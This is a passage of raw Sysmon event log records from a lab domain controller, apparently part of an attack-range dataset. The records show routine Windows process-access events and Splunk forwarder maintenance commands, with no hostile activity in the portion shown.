ll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002371Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002370Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002369Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002368Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002367Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8555-5FCF-6900-000000009101}2560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002366Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8555-5FCF-6900-000000009101}2560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002365Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.627{10ACEC4A-8555-5FCF-6900-000000009101}2560C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002364Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.586{10ACEC4A-8555-5FCF-6800-000000009101}26722704C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002363Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8555-5FCF-6800-000000009101}2672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002362Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002361Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002360Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002359Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002358Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002357Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002356Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002355Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002354Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8555-5FCF-6800-000000009101}2672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002353Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002352Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8555-5FCF-6700-000000009101}27242840C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-8555-5FCF-6800-000000009101}2672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002351Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.360{10ACEC4A-8555-5FCF-6800-000000009101}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-8555-5FCF-6700-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000002350Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8555-5FCF-6700-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002349Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002348Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002347Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002346Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002345Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002344Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 